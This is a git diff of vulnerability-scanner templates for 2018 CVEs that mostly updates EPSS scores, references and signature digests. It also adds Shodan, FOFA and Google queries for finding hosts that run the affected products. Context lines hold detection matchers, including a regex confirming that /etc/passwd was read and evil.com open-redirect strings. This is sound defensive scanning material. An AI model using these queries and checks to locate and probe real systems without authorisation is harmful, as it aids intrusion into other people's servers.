+# digest: 4b0a00483046022100952a1352dd220013331b92a16c56b5dbbf5c5b182026eed1fe8c66a80f18c3f20221008371d2a7719b97ddcef29d12f4bbb58467f8d043fa3f24801eada79ea643b899:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml
index 375c7740ab..24a5cdb12b 100644
--- a/http/cves/2018/CVE-2018-16283.yaml
+++ b/http/cves/2018/CVE-2018-16283.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-16283
cwe-id: CWE-22
- epss-score: 0.0412
- epss-percentile: 0.91963
+ epss-score: 0.25721
+ epss-percentile: 0.96702
cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -38,4 +38,4 @@ http:
part: body
regex:
- "root:.*:0:0:"
-# digest: 490a004630440220566093a92cc8bec90dea2dd4f78b4c6393324f9ae1a6508694ae7ab1961555bd022016fd5d0fb9f8a0483755d3735220fde2bfc22fa1d4ab1e2934215495ccddd3e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f345418a161970b49efb6847c938b02cf85e55ab2728b7a999c99c1298947949022011733c212eabc394a4c104cef7a0ae31b2b2297505c4c2364ac73d2dad0c2411:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml
index dcf16683bf..7ed174c5b3 100644
--- a/http/cves/2018/CVE-2018-16288.yaml
+++ b/http/cves/2018/CVE-2018-16288.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2018-16288
cwe-id: CWE-200
epss-score: 0.12055
- epss-percentile: 0.95227
+ epss-percentile: 0.95357
cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206c44f04d87cd0bb24833f17912104c4fe7f11064d15ad1ec47e91daedda230a402203c5b59f016c1ab24a2a0f0531c04b7fdab6907c1d028f7c976fef3bf42f929eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f25577d15cb32f1ccc5b8c48bd1cee8c81f2c55bf33b6c19e89312d5e7cedc150221008796a9740e57e6b50caf52841a8a4c9d52a17662d1d3ae7bea7549de24603e97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml
index 66bf5e553e..4991b22251 100644
--- a/http/cves/2018/CVE-2018-16671.yaml
+++ b/http/cves/2018/CVE-2018-16671.yaml
@@ -25,7 +25,7 @@ info:
cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
metadata:
max-request: 1
- vendor: "circontrol"
+ vendor: circontrol
product: circarlife_scada
tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol
@@ -50,4 +50,4 @@ http:
part: body
regex:
- "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"
-# digest: 4a0a00473045022100bb761bd732caa4633175fb277ae6cb5413db1b1f38be0f5a60575eb0ac8fcc52022069ee62eab829a913c99b59cb9268d67426dd4012e8ebcaf33d69fe06bb0422de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201c8212563123a44774116d7c5683e77960568efabe2186eddd3a932bec95f59f022100b8c1f6f528d1f59687696f621ec549e669b77b20f5a9c5fe740d557c6b53c652:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml
index 9ffd6e17c3..92f2cb104f 100644
--- a/http/cves/2018/CVE-2018-16716.yaml
+++ b/http/cves/2018/CVE-2018-16716.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 9.1
cve-id: CVE-2018-16716
cwe-id: CWE-22
- epss-score: 0.00543
- epss-percentile: 0.74952
+ epss-score: 0.0045
+ epss-percentile: 0.75058
cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022018fd3deeccb83eb769fde94c8460fb450d314b6cd1d5f09e5e6673e66c1f30d5022100e35701ec81596fff8cae290f6d481ccbebcaeb0da6573b1f149d30d8f945a163:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b54f467183de3b3a31a23eff25fa6b7e31a40b596318042dd4a50afc2466987b02201e7898d41a785ccdb33f9ead77fbcab180c3bc0dca2a626981f431882fed4cb9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml
index 23f9df48fa..1e250bb291 100644
--- a/http/cves/2018/CVE-2018-16761.yaml
+++ b/http/cves/2018/CVE-2018-16761.yaml
@@ -14,18 +14,21 @@ info:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
- https://nvd.nist.gov/vuln/detail/CVE-2018-16761
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16761
cwe-id: CWE-601
- epss-score: 0.00068
- epss-percentile: 0.28116
+ epss-score: 0.00069
+ epss-percentile: 0.29966
cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: eventum_project
product: eventum
+ shodan-query: http.favicon.hash:305412257
+ fofa-query: icon_hash=305412257
tags: cve,cve2018,redirect,eventum,oss,eventum_project
http:
@@ -40,4 +43,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204562ef9fe20f212abf05ec4054f5fb31ac2f4a14939814e81691480bad569df00221008627875be3d1ece4db50fe44826d8bcb8aa0b34273478d04591d11762f1a31eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml
index ce8c147b8c..659b6f5ad7 100644
--- a/http/cves/2018/CVE-2018-16763.yaml
+++ b/http/cves/2018/CVE-2018-16763.yaml
@@ -20,13 +20,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-16763
cwe-id: CWE-74
- epss-score: 0.83285
- epss-percentile: 0.98356
+ epss-score: 0.79227
+ epss-percentile: 0.98278
cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: thedaylightstudio
product: fuel_cms
+ shodan-query: http.title:"fuel cms"
+ fofa-query: title="fuel cms"
+ google-query: intitle:"fuel cms"
tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio
http:
@@ -44,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100aa22ae2b5004894a2274f6ac1b4e153cdcd9a2081a3e84d0853a7612a808693f02202177babac08cedd1a18e2d633c4f2705131f42a6354c14302ec02ebddbfdaf1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204094d65babc7f0b5c8c10d59b17d51f9ce5a347b0e0a86a8b1f4d4b26623b06202204860bf57ffcc49976f3017bfba65e702e9b416919b8f7e5bd18ad345625f0285:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml
index d98d6b1447..cccc297153 100644
--- a/http/cves/2018/CVE-2018-16836.yaml
+++ b/http/cves/2018/CVE-2018-16836.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2018-16836
cwe-id: CWE-22
epss-score: 0.26631
- epss-percentile: 0.96643
+ epss-percentile: 0.96743
cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d269609e9e99d0bdcd79d0fcc8f5b9fbcf7c09469f92d28e20e23c0c03b931b7022054d56d332e1163cb08f2567a622b794aaa85cb5d57b3e78cce3aa57152c9b586:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201c2df0229ff7748acdd22d008c7f88c515a2b5fe7b93f0be7ff4faeaa59e37ca02210082b5dd9724a4b7d1b568fb6c433bcebd074fd44c03fc25152b56981c927cf3a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml
index d47482ca8a..2df7730492 100644
--- a/http/cves/2018/CVE-2018-16979.yaml
+++ b/http/cves/2018/CVE-2018-16979.yaml
@@ -27,6 +27,8 @@ info:
max-request: 1
vendor: monstra
product: monstra
+ shodan-query: http.favicon.hash:419828698
+ fofa-query: icon_hash=419828698
tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss
http:
@@ -46,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205f0f643f0280b3aefe1f1955b44b15712d5ccbcbdf55470bf60ae139ad08b3870221008a61c94baf588d5590ba60988681f69ac91aa02ad71a098ac1c191a627a45c0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml
index 2a1cad77ca..e0dccd1114 100644
--- a/http/cves/2018/CVE-2018-17153.yaml
+++ b/http/cves/2018/CVE-2018-17153.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-17153
cwe-id: CWE-287
- epss-score: 0.81607
- epss-percentile: 0.98273
+ epss-score: 0.59445
+ epss-percentile: 0.97757
cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -30,6 +30,7 @@ info:
vendor: western_digital
product: my_cloud_wdbctl0020hwt_firmware
shodan-query: http.favicon.hash:-1074357885
+ fofa-query: icon_hash=-1074357885
tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital
http:
@@ -49,4 +50,4 @@ http:
- contains(body, "ganalytics")
- status_code == 200
condition: and
-# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022058db5a0e66e0185894958f6d96aecf72c3bcfed2c0a1d26f6add29d09ce286c802200fc8d42f35b7c7769ee299622a43e1f8505ee63afe91b259c4ea10fdaaaff74a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml
index 8218daf197..0247e45dfa 100644
--- a/http/cves/2018/CVE-2018-17246.yaml
+++ b/http/cves/2018/CVE-2018-17246.yaml
@@ -26,7 +26,10 @@ info:
metadata:
max-request: 1
vendor: elastic
- product: "kibana"
+ product: kibana
+ shodan-query: http.title:"kibana"
+ fofa-query: title="kibana"
+ google-query: intitle:"kibana"
tags: cve,cve2018,lfi,kibana,vulhub,elastic
http:
@@ -53,4 +56,4 @@ http:
part: header
words:
- "application/json"
-# digest: 4b0a00483046022100d98c22603e30ee350d3b573d9d5ff4825287da33be904cc6363124775e5f14d2022100d0bdd8ca21310b6a688ca6b83bff7e0985fca4c661abd0703e2b8242d3bf6853:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220617b736bbf999b2273a36778922c989410f903fe4ffae35247d32cf4ee34ebb3022100c153e7a8dc7347707d23c5b67d8a30b1b569d1043c8aa5b1c7a09f288bd0ce50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml
index cca82bc302..93ef2179f2 100644
--- a/http/cves/2018/CVE-2018-17254.yaml
+++ b/http/cves/2018/CVE-2018-17254.yaml
@@ -11,13 +11,16 @@ info:
reference:
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
- https://www.exploit-db.com/exploits/45423/
+ - https://github.com/Nickguitar/Joomla-JCK-Editor-6.4.4-SQL-Injection
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17254
cwe-id: CWE-89
- epss-score: 0.81793
- epss-percentile: 0.98093
+ epss-score: 0.81623
+ epss-percentile: 0.9836
cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:*
metadata:
max-request: 1
@@ -40,4 +43,4 @@ http:
part: body
words:
- '{{md5(num)}}'
-# digest: 4a0a00473045022100b261fe2697190cd7fac57caae056784c0fcdafa77339c5b1b838502a79539d01022021a432a3def85765211df2c94058fa14b19323731d5e4f2f7735033eef2d39b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fc614c7ce6111ad91c84bd0aa0ea41a890f1011589191cb9bf421297dcb368c0022014a093e4b3f0c08bb8ae522059822568b1460a62461658ab6f3f0239ec6a8e69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml
index 28743e3369..82a7c3ab6a 100644
--- a/http/cves/2018/CVE-2018-17422.yaml
+++ b/http/cves/2018/CVE-2018-17422.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2018-17422
cwe-id: CWE-601
epss-score: 0.00118
- epss-percentile: 0.44971
+ epss-percentile: 0.45948
cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -28,6 +28,8 @@ info:
vendor: dotcms
product: dotcms
shodan-query: http.title:"dotCMS"
+ fofa-query: title="dotcms"
+ google-query: intitle:"dotcms"
tags: cve2018,cve,redirect,dotcms
http:
@@ -43,4 +45,4 @@ http:
words:
- "self.location = 'http://evil.com'"
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
-# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203711794115d3d48fe1e54bde3f66294c6322bb5832ec13b693571002187aef62022005459fec38936e0160b953d01498c72eb1547cb6cb2acc349339e9198d2af996:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml
index c0b21f42aa..fe101065ea 100644
--- a/http/cves/2018/CVE-2018-18264.yaml
+++ b/http/cves/2018/CVE-2018-18264.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-18264
cwe-id: CWE-306
- epss-score: 0.96092
- epss-percentile: 0.99459
+ epss-score: 0.95251
+ epss-percentile: 0.9934
cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -48,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ff8e2819554ce13b65be92c0e0817693ae784d7a5bda9516043c29baf3aa80d3022100e51109d7d609a86eae88cc6ca27706ca658e1257ee76890516cbb810a1b12acf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml
index 64fb92a805..8210788332 100644
--- a/http/cves/2018/CVE-2018-18323.yaml
+++ b/http/cves/2018/CVE-2018-18323.yaml
@@ -21,13 +21,16 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-18323
cwe-id: CWE-22
- epss-score: 0.9648
- epss-percentile: 0.99556
+ epss-score: 0.95438
+ epss-percentile: 0.99372
cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: control-webpanel
product: webpanel
+ shodan-query: http.title:"login | control webpanel"
+ fofa-query: title="login | control webpanel"
+ google-query: intitle:"login | control webpanel"
tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss
http:
@@ -44,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220318183b633bf06ad5dedd98bf1929813ef1aab3b120ded116f2cd9da41f85aad022067f75907e311865be4f21eebd8f882881327795f9e270152c2481e329852031e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220573467f2d253679a8ca0abe62ede74d07eb4b89953992c906843c11cad9a695e02201a0f31679a22b7dbe2e68ad75b65e94e48e09602d688d256fa627afd2f05dc5a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml
index 5ba6bb99ba..628e40044e 100644
--- a/http/cves/2018/CVE-2018-18570.yaml
+++ b/http/cves/2018/CVE-2018-18570.yaml
@@ -19,7 +19,7 @@ info:
cve-id: CVE-2018-18570
cwe-id: CWE-79
epss-score: 0.00098
- epss-percentile: 0.39642
+ epss-percentile: 0.40792
cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -47,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022072a99586909e4df9893ddbe97f55ceea487163c8a6d2fa7bb1fd3f426fff0a31022100b894b36b035f3eb1fca2f1ff1dd4c79b5e5e1140d19e9ee8f1e90b9b36ac21e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml
index c9d46aecf6..a995d5aba7 100644
--- a/http/cves/2018/CVE-2018-18608.yaml
+++ b/http/cves/2018/CVE-2018-18608.yaml
@@ -29,6 +29,7 @@ info:
vendor: dedecms
product: dedecms
shodan-query: http.html:"DedeCms"
+ fofa-query: body="dedecms"
tags: cve2018,cve,dedecms,xss
http:
@@ -53,4 +54,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ada522c6515fbef84bfe2b72a16b37eef4b726a80645ce815f8c839f8c3de084022100a9cee0e3010f2c7eab42fd53f0e934584477eeedaf5019a443621776728004e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206c43687be0d104b8b61c5820fb3108d1d4a4cfa6bea57b77dcbcd94a7af9ea2e022100936a9dd029ea2f1718385f1222bd9262bae98a93d800bfc22900ee053409f0f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml
index af06330091..834b7ac852 100644
--- a/http/cves/2018/CVE-2018-18777.yaml
+++ b/http/cves/2018/CVE-2018-18777.yaml
@@ -14,13 +14,15 @@ info:
- https://www.exploit-db.com/exploits/45755
- http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18777
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2018-18777
cwe-id: CWE-22
- epss-score: 0.00224
- epss-percentile: 0.60675
+ epss-score: 0.00185
+ epss-percentile: 0.5564
cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f5bd07c891d0db92b2c4f1e4cbadea6203eafbdf92fabe4996837f51c1c865140221009130e54e81edb9b84222f0c1678adb7130f74463a53656948e28b6ad2491440e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ae2a757ac5e3ef34ba3a5451c8125e2c7fe97fd9bef596f66376117e2764db670221008367fce471250198dca07e7745de56033b0108d5296706c7f9484ab47fed9ae1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml
index 1b1f7330fd..3e8b1624af 100644
--- a/http/cves/2018/CVE-2018-18778.yaml
+++ b/http/cves/2018/CVE-2018-18778.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 6.5
cve-id: CVE-2018-18778
cwe-id: CWE-200
- epss-score: 0.17666
- epss-percentile: 0.96022
+ epss-score: 0.39341
+ epss-percentile: 0.97248
cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -57,4 +57,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100dde2f46dea081ad6ee497f625921fa627e85d86066f46bf0412c3baea3dee44c022100e29b218c3b2f0d942643f9520686a1c2ac7ffe7606193b38c7433e3006313eae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bb4b10a8be843bbc16bdad1882a670d91a4df47976608093c047e589d1ec9d5f022100db20167c16d3b5a54b8abadd1035b44725fa8989926dadda9c968bc8727520d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml
index 32940d4fec..7f19b027a3 100644
--- a/http/cves/2018/CVE-2018-18809.yaml
+++ b/http/cves/2018/CVE-2018-18809.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 6.5
cve-id: CVE-2018-18809
cwe-id: CWE-22
- epss-score: 0.43128
- epss-percentile: 0.97253
+ epss-score: 0.50316
+ epss-percentile: 0.97524
cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:*
metadata:
verified: true
@@ -30,6 +30,7 @@ info:
vendor: tibco
product: jasperreports_library
shodan-query: html:"jasperserver-pro"
+ fofa-query: body="jasperserver-pro"
tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco
http:
@@ -49,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022051e000ecdfd4aa645d1ea0afc88abe972a800a4c61b68a33c00d1e9fb5e511f7022100d82adc8517d67a9a0efbf2798fcd8b9642478f1f7df6f7bc8a2caafc7c07ce11:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220643bdad602251cc6d58d10ec184ad17a9593ec38da13e56f779cf51b825cb69d022100ba41ad28cf862dd0e27bf39455c80ca81106197236893508abca3f291d04b6b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml
index 568e65f5fe..656f2b91d4 100644
--- a/http/cves/2018/CVE-2018-18925.yaml
+++ b/http/cves/2018/CVE-2018-18925.yaml
@@ -20,12 +20,15 @@ info:
cve-id: CVE-2018-18925
cwe-id: CWE-384
epss-score: 0.09538
- epss-percentile: 0.94612
+ epss-percentile: 0.94736
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: gogs
product: gogs
+ google-query: intitle:"sign in - gogs"
+ shodan-query: cpe:"cpe:2.3:a:gogs:gogs"
+ fofa-query: title="sign in - gogs"
tags: cve,cve2018,gogs,lfi,rce,vulhub
http:
@@ -43,4 +46,4 @@ http:
- type: dsl
dsl:
- 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")'
-# digest: 4a0a00473045022100bbf18497c1473eb6fbe65f6fb7e2e9354eb16f76dca39b94fb6541e925e349d30220208960e8eb0667755eda381be2612e38a59d7c23d8f8a6a5418cb030d27d8b5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c343b83bb6fcdc9813518d37b54f04f87156c39b79722af6ac38cc7fdd596bca0220703ec1e97ae904cd7b353800c82f2b395a48062f8439eec1b4b4a2a9eabe91c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml
index 6439455c7b..13bedfdfac 100644
--- a/http/cves/2018/CVE-2018-19137.yaml
+++ b/http/cves/2018/CVE-2018-19137.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-19137
cwe-id: CWE-79
- epss-score: 0.00096
- epss-percentile: 0.39294
+ epss-score: 0.00072
+ epss-percentile: 0.3103
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f031d999e765991f0aa2d1aae2aa9d4c79d9a3839f1dcf48b2c61a3f22a12a2a02202bbbf84485e9943cb9edeb0da4319e13626c70d6079238edafe328e4e16318fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml
index e3bf2d980e..f7e60c03fc 100644
--- a/http/cves/2018/CVE-2018-19287.yaml
+++ b/http/cves/2018/CVE-2018-19287.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2018-19287
cwe-id: CWE-79
- epss-score: 0.37007
- epss-percentile: 0.96816
+ epss-score: 0.36152
+ epss-percentile: 0.97155
cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -30,6 +30,9 @@ info:
vendor: ninjaforma
product: ninja_forms
framework: wordpress
+ publicwww-query: /wp-content/plugins/ninja-forms/
+ shodan-query: http.html:/wp-content/plugins/ninja-forms/
+ fofa-query: body=/wp-content/plugins/ninja-forms/
tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma
http:
@@ -59,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022017ffefd669f716542939f3fbf7cb21c395e7c7444f9c185954a4b4d3f5db6f09022100960d179e7780f639d861a3b9a8d4a7186dc971253532f6ecf8aaaee57396e1d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201fb81765e18255ee1455d4ffdf1c2f4a8423e9fa99a230aef65bdf36dce39db4022100ab9385e54fd245662105f2243c1d25bc4e1c82be787d4f23aea1c9273d13a2cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml
index 783a9f2a6f..3f65170707 100644
--- a/http/cves/2018/CVE-2018-19326.yaml
+++ b/http/cves/2018/CVE-2018-19326.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2018-19326
cwe-id: CWE-22
- epss-score: 0.01158
- epss-percentile: 0.83304
+ epss-score: 0.00845
+ epss-percentile: 0.82119
cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -30,6 +30,7 @@ info:
vendor: zyxel
product: vmg1312-b10d_firmware
shodan-query: http.html:"VMG1312-B10D"
+ fofa-query: body="vmg1312-b10d"
tags: cve2018,cve,lfi,modem,router,edb,zyxel
http:
@@ -48,4 +49,4 @@ http:
part: body
regex:
- "root:.*:0:0:"
